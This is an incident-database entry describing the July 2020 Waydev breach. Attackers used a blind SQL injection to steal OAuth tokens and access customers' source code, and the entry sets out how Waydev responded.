Cyber Incident Victim: Waydev
Date:
Jul 2020
Location:
United States of America
Summary
Hackers exploited a blind SQL injection vulnerability to breach a Git analytics firm's internal database, stealing GitHub and GitLab OAuth tokens which were subsequently used to access source code repositories of other organizations, including at least two confirmed victims. The compromised entity addressed the vulnerability immediately upon discovery, collaborated with platform providers to revoke affected tokens and deploy replacement OAuth applications, and implemented enhanced security protocols such as manual account approvals and activity monitoring while sharing threat indicators with authorities and customers for log analysis.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
On July 3, 2020, Waydev, a Git analytics platform serving software companies, detected a security breach after GitHub’s security team alerted one of its customers regarding suspicious activity traced to their Waydev OAuth token. An investigation revealed attackers had exploited a blind SQL injection vulnerability in Waydev’s systems to infiltrate its internal database and steal GitHub and GitLab OAuth tokens. These tokens, used for integrating Waydev’s analytics with customers’ repositories, were subsequently abused by the attackers to pivot into the codebases of at least two other organizations—digital banking service Dave.com and load-testing platform Flood.io—enabling unauthorized access to their source code projects. Waydev immediately patched the vulnerability upon discovery and collaborated with GitHub and GitLab to delist their original OAuth applications, revoke compromised tokens, and issue replacement tokens to invalidate attacker access. CEO Alex Circei stated evidence indicated only a limited subset of customer codebases were accessed, though the exact scope remained under assessment.
The incident prompted Waydev to notify U.S. authorities and share attacker indicators of compromise—including IP addresses, email addresses, and user-agent strings—to assist customers in reviewing their logs for signs of intrusion. The company implemented enhanced security protocols, introducing manual account approval processes, continuous activity monitoring, and periodic token resets to reduce future exposure. While Dave.com and Flood.io publicly attributed their breaches to the stolen Waydev tokens, no additional compromised entities were confirmed in the initial disclosure. Waydev directed affected users to its support page for further guidance but did not disclose the total number of impacted customers or repositories. The breach underscored risks associated with third-party OAuth token management, particularly when such tokens grant access to critical infrastructure like source code repositories.